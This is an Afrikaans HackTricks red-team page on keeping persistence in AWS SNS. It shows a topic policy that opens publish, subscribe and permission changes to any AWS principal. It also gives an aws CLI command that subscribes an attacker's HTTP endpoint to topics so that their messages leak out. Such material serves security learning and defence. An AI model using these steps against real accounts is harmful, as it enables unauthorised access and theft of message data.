AWS - SNS Persistence

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

SNS

Vir meer inligting, kyk:

pageAWS - SNS Enum

Volharding

Wanneer jy 'n SNS-onderwerp skep, moet jy aandui met 'n IAM-beleid wie toegang het om te lees en te skryf. Dit is moontlik om eksterne rekeninge, ARN van rolle, of selfs "*" aan te dui. Die volgende beleid gee almal in AWS toegang om te lees en te skryf in die SNS-onderwerp genaamd MySNS.fifo:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

Skep Intekenare

Om voort te gaan met die uitlek van alle boodskappe van alle onderwerpe, kan 'n aanvaller intekenare vir al die onderwerpe skep.

Let daarop dat as die onderwerp van die FIFO-tipe is, slegs intekenare wat die protokol SQS gebruik, gebruik kan word.

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated